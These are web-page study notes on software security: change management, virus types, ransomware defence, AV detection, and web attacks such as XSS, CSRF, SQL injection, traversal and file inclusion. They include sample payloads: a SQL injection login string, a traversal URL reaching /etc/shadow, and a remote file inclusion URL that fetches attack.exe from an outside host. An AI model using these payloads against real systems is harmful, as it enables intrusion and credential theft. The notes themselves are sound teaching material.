Skip to main content

Software Security and Threats

Change, Configuration, and Testing

Change and Configuration Management

  • Provides an organized framework.
  • Enables cost/benefit analysis.
  1. Request Control - Enables users to request modifications.
  2. Change Control - Used to recreate and analyze situations for appropriate changes.
  3. Release Control - Procedure for approving changes before releasing them.

Always conduct acceptance testing during release control.

Software Testing

  • Thorough testing before distribution.
  • Use of special datasets to exercise all paths.
  • Automated and manual testing.

Example: If a software is expected to add two numbers, inputting 3 and 4 should yield 7. If it yields 8, then there's an error.

Always compare actual results against expected results during testing.

Viruses 

Types of Viruses

Stealth Viruses

These viruses conceal their presence by tampering with the OS. They deceive antivirus software into believing that the system is operating normally.

Encrypted Viruses

These viruses leverage cryptographic techniques to evade detection. Example: Encrypting a virus into a .rar archive, making it invisible to automatic scans on platforms like Google Drive.

Worms

Worms have built-in propagation mechanisms that automatically spread and do not require user interaction to spread. Instead they automatically scan for vulnerabilities and try and automatically gain access from there. 

Hoaxes

Not viruses, but still a threat. They mislead users and waste resources. Previously spread through chain mails, but now prevalent on social media.

Logic Bombs

Malicious code that remains dormant on a system until triggered by specific conditions (e.g., time, program initiation, or a login). Stuxnet is a prime example: a polymorphic virus with intricate logic bomb mechanisms. Its logic was designed to target and interfere with specific industrial control systems, only activating under precise conditions to sabotage uranium-enrichment operations in Iran. 

Polymorphic Viruses

These viruses alter their own code as they migrate between systems. A significant example is the Storm Worm, which spread rapidly in the 2000s, altering its code to evade detection. It propagated itself through email and was notorious for swiftly adapting its code, making it challenging to detect and neutralize.

Multipartite Viruses

Viruses that employ multiple propagation techniques. They aim to breach systems that are safeguarded against just one method.

Trojan Horse

Trojan Horses are deceptive software programs. While they seem functional and benign, they carry a concealed, harmful payload.

  • Only use software from known, trusted sources.
  • Restrict users' ability to install software.
Ransomware

This malicious software is on the rise. It invades a device and employs encryption tech to lock essential documents. The only decryption key is with the cybercriminal. Victims see a warning: pay a ransom or lose your files.

Reaction:

  • Regularly back up your computer.
  • Store backups in isolated locations.
  • Increase user awareness through training.
  • Use cloud-hosted email & file storage; many offer auto-versioning.

Prevention:

  • Ensure computers are updated and patched.
  • Be wary of suspicious web links.
  • Exercise caution with email attachments.
  • Authenticate email senders before clicking.
  • Invest in preventative software programs.
  • AI-driven cloud services offer added protection like O365 of G-Suite

Virus Propagation Techniques

Viruses employ various techniques to propagate and ensure their persistence. These methods can be categorized into the following:

File Infection

    • Viruses infect different types of executable files.

    • They become active when the operating system executes them.

    • For Windows, these are typically .exe and .com files.

Service Injection

    • Viruses evade detection by embedding themselves into the trusted runtime processes of the OS.

    • Examples include svchost.exe, winlogon.exe, and explorer.exe.

Cheats for games, such as CS:GO, inject into csgo.exe to dodge anti-cheat, much like viruses bypass anti-virus systems.

Boot Sector Infection

    • Viruses infect the legitimate boot sector.
    • These viruses are loaded into memory during the OS load process.

Macro Infection

    • Viruses spread by infecting the code in macros.

    • Commonly, they use Visual Basic for Applications in MS Office documents.

AV Software

Employs multiple strategies to detect and combat malware.

  1. Signature-Based Detection:

    • Uses algorithmic patterns to identify known viruses.

    • Regular updates of virus signatures are critical.

    Example: Windows updates its virus signatures daily.

  2. Behavior-Based Detection:

    • Monitors systems for abnormal activities.

    • Flags or blocks suspicious behavior even if no known signature match is found.

    • Modern solutions leverage AI and ML. Some even connect to cloud systems to analyze potential threats.

    Remember: Modern threats may appear once and vanish, making behavior-based detection essential.

Threats to Software

Techniques to Compromise Password Security:

  1. Password Crackers:

    • Extracts passwords from stolen credential data.
    • Methods can vary and include:
      • Dictionary attack
      • Brute force
      • Social engineering attack

  2. Rootkit (escalation of privilege):

    • A rootkit is essentially a kit that offers root access!
    • Exploits OS vulnerabilities for escalated privileges.
  3. Application Attacks:
    • Targets vulnerabilities in poorly designed software.
  4. Buffer Overflow:
    • Occurs when user input isn't validated for size.
    • Memory buffers can overflow if the input exceeds capacity. Common in web forms.
  5. Backdoor:
    • Undocumented command sequences allowing bypassing of access restrictions.
    • Although useful during development, they sometimes mistakenly remain in the live environment.
    • Example: WannaCry leveraged a backdoor for its zero-click network propagation.
  6. Time-of-Check-to-Time-of-Use:
    • A timing vulnerability where permissions are checked too early before a resource request.
    • Example: Imagine a multi-threaded environment where a file's permission is checked and then accessed later. Between the check and the access, another process could potentially change the file's permissions or even the file itself.

Web Application Vulnerabilities:

Cross-Site Scripting (XSS)

  • A type of injection attack where malicious scripts are inserted into trusted websites.

  • Occurs when an attacker uses a web application to relay malicious code to another user.

  • Typically happens when web apps process unfiltered user input.

Example: A commenting system on a blog displays user comments without filtering. An attacker could input a script as their "comment". Other users viewing the comment will execute the script, potentially stealing cookies or other data.

Cross-site Request Forgery (XSRF or CSRF)

  • Definition: Exploits the trust a user has in a specific website, causing them to unknowingly perform an action they did not intend. Similar to cross-site scripting attacks but exploits a different aspect of the trust relationship.

  • How it works: A malicious website or email makes the user's browser send a request to a trusted site where the user is already authenticated, leading to unwanted actions performed on the trusted site.

  • Mitigation:

    1. Use secure tokens for web apps.
      • This ensures that each request from a user is genuine and not generated by a third party.
    2. Check the referring URL in requests.
      • By doing this, the site can ensure that the request came from the correct location.

Always ensure web apps use secure tokens and validate referring URLs to guard against CSRF attacks.

Cross-Site Tracing (XST)

XST is a more refined version of the Cross-Site Scripting (XSS) attack using the HTTP TRACE method. It's designed to exploit the vulnerability that comes with allowing HTTP TRACE requests by web servers, potentially leading to the theft of sensitive information.

How it works: An attacker exploits a web application vulnerability to send an HTTP TRACE request, causing the server to echo the entire request back. If an attacker tricks a user's browser into issuing this request, the headers, including cookies or authentication data, will be reflected back and can be captured by the attacker.

SQL Injection

Attackers provide unexpected input to manipulate the underlying database. For example, on a login page, instead of a regular password, an attacker inputs password' OR '1' = '1. If not properly sanitized, the database might interpret this as always true, granting unauthorized access.

Input validation, using prepared statements, and limiting account privileges help protect against SQL injection. 

Directory Traversal

Web servers with certain security misconfigurations can allow users to navigate through their directory structure, giving them the potential to access secure files. This vulnerability arises when servers accept directory navigation operators and fail to adequately restrict file access.

On an Apache server with web content in /var/www/html/ and a password file in /etc/shadow, if an attacker uses a URL like http://www.example.com/../../../etc/shadow, they might exploit the directory structure. This method, using the .. operator, can navigate outside the designated web server areas. If successful, the server could reveal sensitive files, setting the stage for further attacks, such as brute-force attempts on server credentials.

File Inclusion

File inclusion attacks elevate directory traversal threats by not just retrieving, but also executing code within a file. This lets attackers trick web servers into running specific code. There are two main types:

  1. Local File Inclusion: Targets and executes a file on the same web server, akin to directory traversal. For instance, an attacker could use a URL like http://www.example.com/app.php?include=C:\\www\\uploads\\attack.exe to run attack.exe from a specified directory.

  2. Remote File Inclusion: More advanced, it allows attackers to execute code stored on an external server. An example would be using the URL http://www.example.com/app.php?include=http://1.1.1.1/attack.exe. If successful, attackers might deploy a web shell, enabling them to commandeer the server through typical HTTP/HTTPS ports. This technique not only bypasses many security tools but might also let the attacker patch the initial vulnerability to hide their actions or prevent further intrusions.

Clickjacking

Tricks users into clicking on something different than what they intended to on a webpage. This is done in two main ways:

  1. By changing the webpage's code (x-frame clickjacking) so that a valid URL is swapped with a malicious one when a user clicks.
  2. By placing an invisible overlay (like a frame or image) on the webpage. The user thinks they're interacting with the original page, but their clicks are captured by this overlay and sent elsewhere.

Clickjacking can lead to phishing, hijacking, and on-path attacks.

Network Reconnaissance Techniques:

  1. IP Probes:

    • Tools attempt to ping a range of addresses.
    • Responsive systems are noted for further investigation.

  2. Port Scan:

    • Identifies open or listening ports on a system.
    • Critical servers like web and file servers are common targets.

  3. Vulnerability Scans:

    • Identifies specific system vulnerabilities.
    • Popular tools include Nessus, OpenVAS, Qualys, and Core Impact.

Back to top